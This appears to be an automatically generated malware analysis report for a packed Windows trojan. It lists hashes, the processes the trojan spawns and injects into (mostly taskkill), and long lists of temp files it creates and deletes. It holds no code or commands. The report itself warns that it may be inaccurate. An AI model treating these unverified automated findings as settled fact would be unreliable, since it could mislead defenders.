Skip to main content

Trojan.Generic.14779156_870adaabb0


Trojan.Generic.14779156 (AdAware), Trojan.NSIS.StartPage.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)Behaviour: Trojan

The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Summary

MD5: 870adaabb0d08155f2e2f0d0d5111c82

SHA1: 2bb70c58118b0f1e15c88f17985192c0b5d07dcc

SHA256: c0b0e10e0dd4b8a419192ddc8e866e34758a0d3f695c9bb1be76e21ba8103d6d

SSDeep: 24576:gRpVgU6qc00PhieAdO7gejjdYKmui3BmK:0VgUo00PQlMHdYvt

Size: 816065 bytes

File type: EXE

Platform: WIN32

Entropy: Packed

PEID: UPolyXv05_v6

Company: no certificate found

Created at: 2009-12-06 00:50:52

Analyzed on: WindowsXP SP3 32-bit

Summary: Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Dynamic Analysis

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

WMIC.exe:568
vchk.exe:1656
taskkill.exe:216
taskkill.exe:1140
taskkill.exe:668
taskkill.exe:136
taskkill.exe:492
taskkill.exe:1832
taskkill.exe:1836
taskkill.exe:1772
taskkill.exe:1548
taskkill.exe:1372
taskkill.exe:936
taskkill.exe:2012
taskkill.exe:1096
taskkill.exe:628
taskkill.exe:1092
taskkill.exe:1492
taskkill.exe:1956
taskkill.exe:1952
taskkill.exe:828
taskkill.exe:1668
taskkill.exe:820
taskkill.exe:376
taskkill.exe:596
taskkill.exe:1124
taskkill.exe:316
taskkill.exe:1088
taskkill.exe:1928
taskkill.exe:1852
taskkill.exe:1856
taskkill.exe:1252
taskkill.exe:1016
taskkill.exe:916
taskkill.exe:1656
taskkill.exe:308
taskkill.exe:448
taskkill.exe:1232
taskkill.exe:440
taskkill.exe:1136
taskkill.exe:1932
taskkill.exe:908
taskkill.exe:1240
taskkill.exe:648
taskkill.exe:1632
taskkill.exe:516
taskkill.exe:1348
taskkill.exe:1340
taskkill.exe:336
taskkill.exe:576
taskkill.exe:856
taskkill.exe:1424
taskkill.exe:1980
taskkill.exe:1584
taskkill.exe:652
taskkill.exe:508
taskkill.exe:480
taskkill.exe:568
taskkill.exe:468
taskkill.exe:464
taskkill.exe:564
taskkill.exe:1804
taskkill.exe:168
taskkill.exe:228
taskkill.exe:1868
taskkill.exe:224
taskkill.exe:1916
taskkill.exe:968
taskkill.exe:1180
taskkill.exe:1456
taskkill.exe:1748
taskkill.exe:1740
taskkill.exe:740
taskkill.exe:1160
taskkill.exe:884
taskkill.exe:1204
taskkill.exe:608
taskkill.exe:552
taskkill.exe:1968
taskkill.exe:872
taskkill.exe:956
taskkill.exe:320
taskkill.exe:1112
taskkill.exe:324
taskkill.exe:1752
taskkill.exe:612
taskkill.exe:1888
taskkill.exe:1884
taskkill.exe:1760
taskkill.exe:1880
taskkill.exe:1284
taskkill.exe:512
taskkill.exe:1472
taskkill.exe:808
taskkill.exe:2008
taskkill.exe:1368
%original file name%.exe:1756

The Trojan injects its code into the following process(es):

winonit.exe:1360
getcap.exe:500
wincheckfe.exe:1768
wcheckf.exe:484
vchk.exe:1976
internetport3.exe:360
DYK287G2Jhwy64P0Ln0s.exe:1012

Mutexes

The following mutexes were created/opened:No objects were found.

File activity

The process winonit.exe:1360 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

C:\a\avv.txt (2432 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ICMA9FQ2\vv[1].htm (2432 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SXBXQRST\uur[1].htm (2 bytes)
C:\a\ahho.txt (4 bytes)
C:\a\auur.txt (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nshA.tmp\inetc.dll (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\IE36GWQC\hho[1].htm (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nshA.tmp\KillProcDLL.dll (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nshA.tmp\System.dll (11 bytes)

The Trojan deletes the following file(s):

C:\a\vv.txt (0 bytes)
C:\a\uur.txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nshA.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh9.tmp (0 bytes)
C:\a\hho.txt (0 bytes)

The process getcap.exe:500 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

C:\a\7za.exe (15192 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsyD.tmp\System.dll (11 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsyD.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiC.tmp (0 bytes)

The process WMIC.exe:568 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%Program Files%\FastInternet\TempWmicBatchFile.bat (0 bytes)
C:\a\ProcessList.txt (1888 bytes)

The Trojan deletes the following file(s):

C:\a\ProcessList.txt (0 bytes)

The process wincheckfe.exe:1768 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\FindProcDLL.dll (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp\System.dll (11 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsw6.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsg5.tmp (0 bytes)

The process wcheckf.exe:484 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsg8.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsg8.tmp\FindProcDLL.dll (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\yuntnani\vchk.exe (3808 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\IE36GWQC\vchk[1].exe (3808 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsg8.tmp\inetc.dll (20 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsg7.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsg8.tmp (0 bytes)

The process vchk.exe:1976 makes changes in the file system.


The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns4B.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns22.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns77.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns84.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns1A.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns7E.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns18.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns86.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns3A.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns11.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns81.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns8B.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns8E.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns62.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns8F.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns97.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns56.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns26.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\inetc.dll (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns24.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns6E.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\nsA1.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns23.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns75.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns87.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns64.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns99.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns2C.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns4D.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns14.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns8D.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns72.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns9E.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns9B.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns57.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns25.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns5B.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns76.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns6A.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns47.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns1F.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns7F.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\nsExec.dll (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns6C.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns2D.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns51.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns5C.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns94.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\nsAF.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns92.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\nsAA.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns61.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns48.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns29.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\nsA2.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns59.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns78.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns6B.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\nsA6.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns53.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns3D.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\nsAE.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns16.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns1B.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns93.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns83.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns74.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns2B.tmp (6 bytes)
C:\a\avchk.txt (2026 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns54.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\nsAC.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\nsA5.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns50.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns63.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns79.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns73.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns8A.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns21.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns46.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns37.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns89.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\nsA4.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns3E.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns30.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\nsA3.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns4A.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns90.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns1D.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns95.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns67.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns9D.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns36.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns1E.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns5D.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns60.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns9F.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns58.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns33.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns3F.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns68.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns5F.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns98.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns7C.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns39.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns3C.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns28.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns82.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns52.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\nsA7.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns69.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns9A.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns80.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns49.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns55.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns17.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns20.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns41.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns4C.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns15.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns66.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns4F.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns1C.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns44.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\nsAB.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns10.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\nsA9.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns5A.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns12.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns9C.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns19.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns65.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SZPECZLK\vchk[1].htm (2026 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns40.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns32.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns34.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns42.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns2F.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns5E.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns45.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns2A.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\nsA8.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns31.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns4E.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns6F.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns85.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns13.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns91.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns38.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns6D.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns96.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns88.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns8C.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns71.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns43.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns7D.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns70.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns35.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns7A.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns2E.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns7B.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\nsA0.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\nsAD.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns3B.tmp (6 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns4B.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns22.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns77.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns84.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns1A.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns7E.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns18.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns86.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns3A.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns11.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns81.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns8B.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns8E.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns62.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns8F.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns97.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns56.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns26.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns24.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns6E.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\nsA1.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns23.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns75.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns87.tmp (0 bytes)
C:\a\vchk.txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns64.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns99.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns2C.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns4D.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns14.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns8D.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns72.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns9E.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns9B.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns57.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns25.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns5B.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns76.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns6A.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns47.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns1F.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns7F.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiE.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns6C.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns2D.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns51.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns5C.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns94.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns92.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\nsAA.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns61.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns48.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns29.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\nsA2.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns7B.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns59.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns78.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns6B.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns53.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns3D.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\nsAE.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns16.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns1B.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns93.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns83.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns74.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns2B.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\nsA6.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns54.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\nsAC.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\nsA5.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns50.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns63.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiF.tmp\ns79.tmp (0 bytes)
